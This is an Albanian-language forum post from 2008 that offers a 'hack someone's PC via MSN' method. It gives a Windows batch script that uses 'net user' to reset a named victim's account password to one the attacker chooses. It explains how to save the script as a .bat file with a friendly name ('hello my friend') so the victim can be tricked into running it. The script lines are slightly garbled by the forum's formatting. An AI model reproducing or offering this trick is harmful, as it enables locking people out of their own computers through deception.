betim kastrati

betim kastrati
 
HomeHome  FAQFAQ  SearchSearch  MemberlistMemberlist  UsergroupsUsergroups  RegisterRegister  Log inLog in  

Share | 
 

 Hacko Pc Dikujna Permes MSN

View previous topic View next topic Go down 
AuthorMessage
betim kastratiPosts : 102
Join date : 2008-08-14

PostSubject: Hacko Pc Dikujna Permes MSN   Thu Aug 14, 2008 9:29 am

kjo osht per ata qe nuk e kan kuptu ata te paren qe kjo osht ni menyr me e leht une e kom provu 100% funksionon per te funksionuar kjo duhet te dini net userin e atij qe deshironi tja hackoni pc kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani

1echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "tung i dashuri shok "
4ause

je nje spjegim me konktret

1echo off
2:net user arlindpeja *123456*
3:echo tung i dashuri shok
4ause

mos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikė bat( .bat ) psh.. tung shoku im.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon
Back to top Go down
View user profile
 
Hacko Pc Dikujna Permes MSN
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
betim kastrati :: Your first category :: Your first forum-
Jump to: